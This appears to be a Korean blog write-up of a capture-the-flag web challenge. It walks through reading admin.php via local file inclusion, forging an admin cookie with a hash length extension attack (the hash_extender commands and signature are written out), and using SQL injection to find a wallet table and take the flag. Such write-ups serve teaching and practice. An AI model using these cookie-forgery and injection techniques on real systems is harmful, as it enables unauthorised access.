http://54.211.6.40/ 에 접속시 이런 서비스가 돌아가고있었다.
LFI 취약점을 사용해 admin.php의 내용을 미리 엿볼수있었고,
소스도 볼수있었다.ㅎㅎㅎㅎㅎㅎ
아는 형에게 물어본 결과 hash extension attack 인것을 알고는 hash_extender 를 사용하여
kjungi704@jungiui-MacBook-Pro hash_extender $ for((i=1;i<=50;i++));do ./hash_extender -d "b:0;" -s ef16c2bffbcf0b7567217f292f9c2a9a50885e01e002fa34db34c0bb916ed5c3 -a "b:1;" --out-data-format html -l $i >> mtpox_auth; done
kjungi704@jungiui-MacBook-Pro hash_extender $ for((i=1;i<=50;i++));do ./hash_extender -d ";0:b" -s ef16c2bffbcf0b7567217f292f9c2a9a50885e01e002fa34db34c0bb916ed5c3 -a ";1:b" --out-data-format html -l $i >> mtpox_hsh; done
이렇게 길이를 모르기때문에 1~50 길이의 해쉬를 새로 생성하였다.
그러나 다시 읽어본결과 http://54.211.6.40/index.php?page=about 에 'admin cookie using by 8-byte salt' 라는 문구가 있었고, 고생을 할필요가 없었기에,
kjungi704@jungiui-MacBook-Pro hash_extender $ ./hash_extender -d "b:0;" -s ef16c2bffbcf0b7567217f292f9c2a9a50885e01e002fa34db34c0bb916ed5c3 -a "b:1;" --out-data-format html
kjungi704@jungiui-MacBook-Pro hash_extender $ ./hash_extender -d ";0:b" -s ef16c2bffbcf0b7567217f292f9c2a9a50885e01e002fa34db34c0bb916ed5c3 -a ";1:b" --out-
data-format html
이렇게 이렇게 해쉬를 생성하여, 쿠키값에 넣어줬더니,
admin 을 따게되었다.
그리곤 저 입력 form에 sql injection을 하여 table 명은 plaidcoin_wallets 라는것을 알게되었고, column은 id와 coins가 있다는것을 알게되었다.
table과 column명을 모두 알아냈기에 공격을 하여 키값을 획득하였다.
CLEAR!
댓글 없음:
댓글 쓰기